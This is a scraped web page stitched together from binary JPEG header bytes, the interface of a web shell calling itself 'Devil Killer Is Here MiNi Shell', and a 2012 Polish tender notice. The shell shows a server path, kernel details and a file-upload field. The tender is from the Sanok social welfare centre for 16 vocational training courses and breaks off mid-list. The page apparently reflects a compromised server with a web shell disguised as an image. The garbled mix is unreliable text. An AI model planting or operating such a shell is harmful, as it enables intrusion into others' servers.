JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120621/214216-N-2012.html

<p class="kh_header"><b>Sanok: Zorganizowanie i przeprowadzenie usług szkolenia zawodowego dla osób będących uczestnikami:

Programu Rewitalizacji Społecznej Lepsze Jutro realizowanego w ramach projektu systemowego Rewitalizacja Społeczna Program Operacyjny Kapitał Ludzki  oraz

Projektu Systemowego Czas na aktywność w gminie miejskiej Sanok realizowanego w Ramach Programu Operacyjnego kapitał Ludzki priorytet VII Promocja Integracji Społecznej</b><br>
<b>Numer ogłoszenia: 214216 - 2012; data zamieszczenia: 21.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Zamkowa 30, 38-500 Sanok, woj. podkarpackie, tel. 013 4632810, faks 013 4641368.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie usług szkolenia zawodowego dla osób będących uczestnikami:

Programu Rewitalizacji Społecznej Lepsze Jutro realizowanego w ramach projektu systemowego Rewitalizacja Społeczna Program Operacyjny Kapitał Ludzki  oraz

Projektu Systemowego Czas na aktywność w gminie miejskiej Sanok realizowanego w Ramach Programu Operacyjnego kapitał Ludzki priorytet VII Promocja Integracji Społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Kurs przedstawiciela handlowego z prawem jazdy kat. B 22 osoby w ramach Programu Lepsze Jutro 
2.  Kurs obsługa kasy fiskalnej z obsługą komputera 17 osób w ramach Programu Lepsze Jutro oraz 10 osób w ramach projektu Czas na aktywność w gminie miejskiej Sanok
3.  Kurs Prawo jazdy kat. C E z kwalifikacją wstępną przyspieszoną  1 osoba w ramach Programu Lepsze Jutro oraz  1 osoba w ramach projektu Czas na aktywność w gminie miejskiej Sanok  oraz Kurs prawo jazdy kat. C z kwalifikacja wstępna przyspieszoną   7 osób w ramach Programu Lepsze Jutro 4 osoby w ramach projektu Czas na aktywność w gminie miejskiej Sanok
4. Kurs kucharz małej gastronomii 4 osoby w ramach Programu Lepsze Jutro
5.  Kurs ciastkarz  cukiernik  2 osoby w ramach Programu Lepsze Jutrooraz 7 osób w ramach projektu Czas na aktywność w gminie miejskiej Sanok
6.  Kurs bukieciarstwa 7 osób w ramach Programu Lepsze Jutro
7.  Magazynier - operator wózka jezdniowego z systemem HACCP 6 osób w ramach Programu Lepsze Jutro oraz 5 osób w ramach projektu Czas na aktywność w gminie miejskiej Sanok
8.  Kurs operator koparko  ładowarki klasa III wszystkie typy  4 osoby w ramach  Programu Lepsze Jutro oraz 3 osoby w ramach projektu Czas na aktywność w gminie miejskiej Sanok
9. Kurs księgowość małych i średnich firm 4 osoby w ramach Programu Lepsze Jutro
10. Kurs opiekunka środowiskowa  2 osoby w ramach Programu Lepsze Jutro oraz 9 osób w ramach projektu Czas na aktywność w gminie miejskiej Sanok
11.Kurs technolog robót wykończeniowych  1 osoba w ramach Programu Lepsze Jutro oraz 4 osoby w ramach projektu Czas na aktywność w gminie miejskiej Sanok
12. Kurs energetyczny  uprawnienia SEP do 1kV   1 osoba w ramach programu Lepsze Jutro 
13.Kurs grafika komputerowa  2 osoby w ramach Programu Lepsze Jutro
14. Kurs kosmetyczny z elementami wizażu 3 osoby w ramach projektu Czas na aktywność w gminie miejskiej Sanok
15.Kurs spawania metodą MAG podstawowy Metoda 135  dla  3 osób w ramach projektu Czas na aktywność w gminie miejskiej Sanok
16.Kurs spawanie metodą TIG 141  dla 1 osoba w ramach projektu Czas na aktywność w gminie miejskiej Sanok
Wymagania ogólne w zakresie

Merytorycznym:
Przeprowadzenie zamówienia zgodnie z ustalonym programem nauczania i harmonogramem zajęć osobno dla każdej części zamówienia.
Prowadzenia dokumentacji przebiegu szkolenia, tj. dziennika zajęć edukacyjnych zawierającego listę obecności, wymiar godzin zajęć edukacyjnych, potwierdzenia odbioru materiałów szkoleniowych, potwierdzenia otrzymania zimnego oraz gorącego poczęstunku w postaci dania obiadowego, tematy zajęć edukacyjnych, protokołu z egzaminu oraz rejestru wydanych zaświadczeń a po zakończeniu szkolenia przekazania oryginałów tych dokumentów Zamawiającemu wraz z kserokopiami zaświadczeń lub certyfikatów potwierdzających ukończenie szkolenia z odpowiednim oznakowaniem promocyjnym
Zapewnienie uczestnikom przez Wykonawcę od pierwszego dnia zajęć niezbędnych        materiałów szkoleniowych oznakowanych zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki wymaganych przez podmioty kontrolujące, które zostaną ujęte w cenie i przejdą w ich posiadanie.

Organizacyjnym
Miejsce realizacji zamówienia Gmina Miasta Sanok.
Liczba godzin zajęć dziennie na osobę nie może być mniejsza niż 6 godzin zegarowych i nie większa niż 8 godzin zegarowych. 
Godzina zegarowa ma liczyć 60 minut i obejmować zajęcia edukacyjne liczące 45 minut oraz przerwę, liczącą średnio 15 minut
W ofercie szkoleń dla uczestników należy uwzględnić codzienny catering w trakcie zajęć trwających powyżej 6 godzin zegarowych w kwocie nie mniejszej niż 25 złna uczestnika, na który składa się: obiad dwudaniowy oraz serwis kawowy kawa, herbata, woda wg potrzeb uczestników.
Zajęcia szkoleniowe trwają w układzie dni poniedziałek  piątek, za wyjątkiem dni ustawowo wolnych od pracy.
Zapewnienie podczas zajęć teoretycznych odpowiednich pomieszczeń szkoleniowych do przeprowadzenia zajęć, wyposażonych w odpowiednią liczbę miejsc i stolików w zależności od liczby uczestników szkolenia wraz z zapleczem sanitarnym,
Zapewnienie odpowiedniego wyposażenia pomieszczeń szkoleniowych flipchart lub tablica klasyczna, magnetyczna, multimedialna, sprzęt audiowizualny.
Zapewnienie podczas zajęć praktycznych odpowiednich warunków pracy, niezbędnych materiałów, surowców urządzeń i narzędzi spełniających wymogi BHP w ilości i stanie technicznym zapewniającym odpowiedni poziom szkolenia oraz swobodny dostęp do stanowiska, przy którym będzie odbywała się praktyka.
Zapewnienie uczestnikom podczas zajęć praktycznych niezbędnych odzieży ochronnej, ubrań roboczych, obuwia roboczego i środków ochrony indywidualnejzgodnie z przepisami BHP.
Zapoznanie uczestników poszczególnych szkoleń z przepisami BHP.
Wykonawca realizujący zamówienie zapewni dla wszystkich skierowanych uczestników ubezpieczenie zbiorowe od następstw NW.
W przypadku skierowania dodatkowych osób celem uzupełnienia ilości uczestników, Wykonawca zapewni im ubezpieczenie od następstw NW od chwili rozpoczęcia           szkolenia.
Wykonawca uwzględni zróżnicowany poziom zdrowia, wykształcenia, umiejętności 
i wiedzy uczestników szkoleń.
Wykonawca jest obowiązany do przeprowadzenia ankiety ewaluacyjnej na początku i końcu szkolenia,
Wykonawca będzie systematycznie informował Zamawiającego o absencji uczestników kursu lub rezygnacji z uczestnictwa w trakcie jego trwania, a także innych okolicznościach mających wpływa na realizację programu nauczania. Zgłoszenia o nieobecności powinny być dokonywane telefonicznie oraz mailowo do Koordynatora Merytorycznego
Wykonawca przedkłada Zamawiającemu listę obecności uczestników za każdy dzień szkolenia. 
Wykonawca po zakończeniu szkolenia i pozytywnym zdaniu egzaminu wewnętrznego i lub zewnętrznego w zależności od rodzaju prowadzonego kursu wyda uczestnikowi szkolenia certyfikat dyplom oraz  zaświadczenie uczestnictwa w kursie zgodne z § 6 Rozporządzenia Ministra Edukacji Narodowej i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych Dz.U. Nr.31, poz. 216 z odpowiednim oznakowaniem promocyjnym. 
Wykonawca jest zobowiązany do oznakowania
 	wszystkich materiałów szkoleniowych, dydaktycznych oraz pozostałej dokumentacji związanej z prowadzeniem kursu zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 
	pomieszczeń gdzie realizowane będą zajęcia zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 
Wykonawca zobowiązany jest do przechowywania dokumentów związanych z realizowanym zleceniem do dnia 31.12.2020r. 

Wymagania szczegółowe dotyczące organizacji poszczególnych kursów oraz terminy realizacji zostały opisane w załącznikach od 1.1. do 1.16.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających na podstawie 
 art 67 ust.1 pkt.6 polegających na powtórzeniu tego samego rodzaju zamówień. Wartość zamówień uzupełniających stanowi nie więcej niż 50 % wartości zamówienia podstawowego i polega na powtórzeniu tego samego rodzaju zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania uprawnień do wykonywania określonej działalności lub czynności będzie spełniony jeżeli Wykonawca przedłoży podpisane Oświadczenie o spełnianiu warunków udziału w postępowaniu  Załącznik nr. 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia będzie spełniony jeżeli Wykonawca wykaże, że 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał lub wykonuje  co najmniej 2 zamówienia tożsame lub odpowiadające wybranej części zamówienia

Doświadczenie firmy  załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania odpowiedniego potencjału technicznego będzie spełniony jeżeli Wykonawca przedłoży podpisany Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń 
dostępnych Wykonawcy w celu realizacji zamówienia załącznik nr. 6 do SIWZ lub w przypadku dysponowania potencjałem innego wykonawcy   załącznik nr 7 do SIWZ.
W zakresie dysponowania potencjałem technicznym Zamawiający wymaga aby Wykonawca dysponował
w przypadku kursu Przedstawiciela handlowego z prawem jazdy kat. B  wykonawca musi dysponować minimum dwoma pojazdami  spełniającymi wymagania niniejszego kursu oraz odpowiednim placem manewrowym do przeprowadzenia  szkolenia praktycznego oraz odpowiednią salą szkoleniową do przeprowadzenia zajęć wyposażoną w odpowiednią liczbę miejsc i stolików wraz z zapleczem sanitarnym oraz wyposażoną  w minimum flipchart lub tablicę klasyczną, magnetyczną lub multimedialna, sprzęt audiowizualny lub przedstawi pisemne zobowiązanie innego podmiotu do oddania mu do dyspozycji ww. pomieszczeń, sprzętu i placu, na okres korzystania z nich przy wykonaniu zamówienia. 
W przypadku kursu Obsługa kasy fiskalnej z obsługą komputera  Wykonawca musi dysponować odpowiednią liczbą stanowisk komputerowych w ramach jednej grupy szkoleniowej liczącej maksymalnie 9 osób co najmniej 9 stanowisk komputerowych wraz z niezbędnym oprogramowaniem a także stanowisk przy kasach fiskalnych  minimum 5 kas fiskalnych z niezbędnym oprogramowaniem odpowiednią salą szkoleniową do przeprowadzenia zajęć, wyposażoną w odpowiednią liczbę miejsc i stolików wraz z zapleczem sanitarnym oraz wyposażoną  w minimum flipchart lub tablicę klasyczną, magnetyczną, multimedialną oraz sprzęt audiowizualny lub przedstawi pisemne zobowiązanie innego podmiotu  do oddania mu do dyspozycji ww. pomieszczeń i sprzętu. 
W przypadku kursuPrawo jazdy kat. CE z kwalifikacją wstępną przyśpieszoną wykonawca musi dysponować minimum jednym pojazdem spełniającym wymagania niniejszego kursu oraz odpowiednim placem manewrowym do przeprowadzenia  szkolenia praktycznego, odpowiednią salą szkoleniową do przeprowadzenia zajęć, wyposażoną w odpowiednią liczbę miejsc i stolików wraz z zapleczem sanitarnym oraz wyposażoną  w minimum flipchart lub tablicę klasyczną, magnetyczną lub multimedialną, oraz sprzęt audiowizualny lub przedstawić pisemne zobowiązanie innego podmiotu do oddania mu do dyspozycji ww. pomieszczeń sprzętu i placu, na okres korzystania z nich przy wykonaniu zamówienia. 
W przypadku kursu Prawa jazdy kat. C z kwalifikacja wstępną przyśpieszoną wykonawca musi dysponować minimum jednym pojazdem  spełniającym wymagania niniejszego kursu oraz odpowiednim placem manewrowym do przeprowadzenia  szkolenia praktycznego, odpowiednią salą szkoleniową do przeprowadzenia zajęć, wyposażoną w odpowiednią liczbę miejsc i stolików wraz z zapleczem sanitarnym, wyposażoną  w minimum flipchart lub tablicę klasyczną, magnetyczną lub multimedialną, oraz sprzęt audiowizualny lub przedstawić pisemne zobowiązanie innego podmiotu do oddania mu do dyspozycji ww. pomieszczania, sprzętu i placu, na okres korzystania z nich przy wykonaniu zamówienia. 
W przypadku kursu Kucharz małej gastronomii wykonawca musi dysponować salą na zajęcia praktyczne wyposażoną w sprzęt oraz narzędzia kuchenne niezbędne dla 4 uczestników szkolenia, odpowiednią salą na zajęcia teoretyczne wyposażoną w odpowiednią liczbę miejsc i stolików wraz z zapleczem sanitarnym, oraz w minimum flipchart lub tablicę klasyczną, magnetyczną lub multimedialną i sprzęt audiowizualny lub przedstawić pisemne zobowiązanie innego podmiotu do oddania mu do dyspozycji ww. sprzętu i pomieszczeń, na okres korzystania z nich przy wykonaniu zamówienia
W przypadku kursu Ciastkarz  cukiernik wykonawca musi dysponować salą na zajęcia praktyczne wyposażoną w sprzęt oraz narzędzia kuchenne niezbędne dla 9 uczestników szkolenia a także odpowiednią salą szkoleniową do przeprowadzenia zajęć teoretycznych, wyposażoną w odpowiednią liczbę miejsc i stolików wraz z zapleczem sanitarnym oraz  w minimum flipchart lub tablicę klasyczną, magnetyczną lub multimedialną, oraz sprzęt audiowizualny lub przedstawić pisemne zobowiązanie innego podmiotu do oddania mu do dyspozycji ww. sprzętu i pomieszczeń, na okres korzystania z nich przy wykonaniu zamówienia
W przypadku Kursu bukieciarstwa wykonawca musi dysponować salą na zajęcia teoretyczne i praktyczne  wyposażoną w sprzęt oraz narzędzia niezbędne podczas zajęć praktycznych dla 7 uczestników szkolenia, wyposażoną w odpowiednią liczbę miejsc i stolików wraz z zapleczem sanitarnym wyposażoną  w minimum flipchart lub tablicę klasyczną, magnetyczną lub multimedialną, oraz sprzęt audiowizualny lub przedstawić pisemne zobowiązanie innego podmiotu do oddania mu do dyspozycji ww sprzętu i pomieszczeń, na okres korzystania z nich przy wykonaniu zamówienia
W przypadku kursu Magazynier  operator wózka jezdniowego z systemem HACCP   wykonawca musi dysponować minimum jednym pojazdem  spełniającym wymagania niniejszego kursu oraz odpowiednim placem manewrowym do przeprowadzenia  szkolenia praktycznego oraz odpowiednią salą szkoleniową do przeprowadzenia zajęć, wyposażoną w odpowiednią liczbę miejsc i stolików wraz z zapleczem sanitarnym oraz w minimum flipchart lub tablicę klasyczną, magnetyczną lub multimedialną, oraz sprzęt audiowizualny lub przedstawić pisemne zobowiązanie innego podmiotu do oddania mu do dyspozycji ww. pomieszczeń, sprzętu i placu, na okres korzystania z nich przy wykonaniu zamówienia. 
W przypadku kursu  Operator koparko  ładowarki klasa III wszystkie typy  wykonawca musi dysponować minimum jednym pojazdem  spełniającym wymagania niniejszego kursu oraz odpowiednim placem manewrowym do przeprowadzenia  szkolenia praktycznego oraz odpowiednią salą szkoleniową do przeprowadzenia zajęć, wyposażoną w odpowiednią liczbę miejsc i stolików wraz z zapleczem sanitarnym oraz w minimum flipchart lub tablicę klasyczną, magnetyczną lub multimedialną, oraz sprzęt audiowizualny lub przedstawić pisemne zobowiązanie innego podmiotu do oddania mu do dyspozycji ww. sprzętu i placu, na okres korzystania z nich przy wykonaniu zamówienia.
W przypadku kursu Księgowość małych i średnich firm Wykonawca musi dysponować odpowiednią salą szkoleniową do przeprowadzenia zajęć, wyposażoną w odpowiednią liczbę miejsc i stolików wraz z zapleczem sanitarnym oraz  w minimum flipchart lub tablicę klasyczną, magnetyczną lub multimedialną, sprzęt audiowizualny oraz liczbą stanowisk komputerowych, co najmniej 4 stanowiska komputerowe wraz z niezbędnym oprogramowaniem lub przedstawić pisemne zobowiązanie innego podmiotu  do oddania mu do dyspozycji ww. sprzętu. 
W przypadku kursu Opiekunka środowiskowa wykonawca musi dysponować odpowiednią salą szkoleniową do przeprowadzenia zajęć, wyposażoną w odpowiednią liczbę miejsc i stolików wraz z zapleczem sanitarnym oraz  w minimum flipchart lub tablicę klasyczną, magnetyczną lub multimedialną, oraz sprzęt audiowizualny lub przedstawić pisemne zobowiązanie innego podmiotu  do oddania mu do dyspozycji ww. sprzętu. 
W przypadku kursu Technolog robót wykończeniowych wykonawca musi dysponować odpowiednią salą szkoleniową do przeprowadzenia zajęć, wyposażoną w odpowiednią liczbę miejsc i stolików wraz z zapleczem sanitarnym oraz wyposażoną  w minimum flipchart lub tablicę klasyczną, magnetyczną lub multimedialną, oraz sprzęt audiowizualny lub przedstawić pisemne zobowiązanie innego podmiotu  do oddania mu do dyspozycji ww. sprzętu
W przypadku Kursu energetycznego  uprawnienia SEP do 1 Kv wykonawca musi dysponować odpowiednią salą szkoleniową do przeprowadzenia zajęć teoretycznych i praktycznych wyposażoną w odpowiednią liczbę miejsc i stolików wraz z zapleczem sanitarnym oraz wyposażoną  w minimum flipchart lub tablicę klasyczną, magnetyczną lub multimedialną, i sprzęt audiowizualny oraz odpowiednią salą na zajęcia praktyczne wyposażoną w niezbędny sprzęt zgodnie ze specyfiką kursu lub przedstawić pisemne zobowiązanie innego podmiotu  do oddania mu do dyspozycji ww. sprzętu
W przypadku kursu Grafika komputerowa Wykonawca musi dysponować salą szkoleniową wyposażoną w odpowiednią liczbą stanowisk komputerowych co najmniej 2 stanowiska komputerowe wraz z niezbędnym oprogramowaniem wraz z zapleczem sanitarnym oraz wyposażoną  w minimum flipchart lub tablicę klasyczną, magnetyczną lub multimedialną, oraz sprzęt audiowizualny lub przedstawić pisemne zobowiązanie innego podmiotu do oddania mu do dyspozycji ww. sprzętu, na okres korzystania z nich przy wykonaniu zamówienia.
W przypadku kursu Kosmetycznego z elementami wizażu wykonawca musi dysponować salą na zajęcia teoretyczne i praktyczne wyposażoną w sprzęt oraz narzędzia niezbędne podczas zajęć praktycznych dla uczestników szkolenia, wyposażoną w minimum flipchart lub tablicę klasyczną, magnetyczną lub multimedialną, oraz sprzęt audiowizualny lub przedstawić pisemne zobowiązanie innego podmiotu do oddania mu do dyspozycji ww. sprzętu, na okres korzystania z nich przy wykonaniu zamówienia.
W przypadku kursu Spawanie metodą MAG podstawowy metoda 135 wykonawca musi dysponować salą na zajęcia teoretyczne i praktyczne wyposażoną w sprzęt oraz narzędzia niezbędne podczas zajęć praktycznych dla uczestników szkolenia, wyposażoną w minimum flipchart lub tablicę klasyczną, magnetyczną lub multimedialną, oraz sprzęt audiowizualny lub przedstawić pisemne zobowiązanie innego podmiotu do oddania mu do dyspozycji ww. sprzętu, na okres korzystania z nich przy wykonaniu zamówienia.
W przypadku kursu Spawanie metodą TIG wykonawca musi dysponować salą na zajęcia teoretyczne i praktyczne wyposażoną w sprzęt oraz narzędzia niezbędne podczas zajęć praktycznych dla uczestników szkolenia, wyposażoną w minimum flipchart lub tablicę klasyczną, magnetyczną lub multimedialną, oraz sprzęt audiowizualny lub przedstawić pisemne zobowiązanie innego podmiotu do oddania mu do dyspozycji ww. sprzętu, na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia będzie spełniony jeżeli Wykonawca wykaże, że dysponuje osobami odpowiedzialnymi za świadczenie usług szkoleń które w okresie ostatnich pięciu lat przed upływem terminu składania ofert wykonały 2 usługi szkoleniatożsame lub odpowiadające wybranej części zamówienia pn. 

1.  Kurs przedstawiciela handlowego z prawem jazdy kat. B
2.   Kurs obsługa kasy fiskalnej z obsługą komputera
3.  Kurs Prawo jazdy kat. C E z kwalifikacją wstępną przyspieszoną  oraz Kurs prawo jazdy     kat. C z kwalifikacja wstępna przyspieszoną  
4.  Kurs kucharz małej gastronomii 
5.  Kurs ciastkarz  cukiernik
6.  Kurs bukieciarstwa
7.  Magazynier  operator wózka jezdniowego z systemem HACCP 
8.  Kurs operator koparko  ładowarki klasa III wszystkie typy 
9.  Kurs księgowość małych i średnich firm
10.  Kurs opiekunka środowiskowa
11.  Kurs technolog robót wykończeniowych
12.  Kurs energetyczny  uprawnienia SEP do 1kV
13. Kurs grafika komputerowa 
14. kurs kosmetyczny z elementami wizażu
15 .kurs spawania metodą MAG podstawowy metoda 135
16. Kurs spawania metodą TIG 141 

lub dysponuje osobami które w okresie ostatnich trzech lat przed upływem terminu składania ofert wykonaływykonują pracę umoway o pracę, umoway cywilnoprawne przez okres  minimum 18 miesięcy np. na stanowisku nauczyciela, wykładowcy. 
Wykonanawykonywana praca musi być tożsama lub odpowiadająca wybranej części zamówienia.

 Wiedza i doświadczenie personelu przewidywanego do przeprowadzenia zamówienia załącznik nr 5 do SIWZ oraz załącznik nr 7 do SIWZ jeżeli dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania odpowiedniej sytuacji ekonomicznej i finansowej będzie spełniony jeżeli Wykonawca przedłoży podpisane Oświadczenie o spełnieniu warunków udziału w postępowaniu załącznik nr 2 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
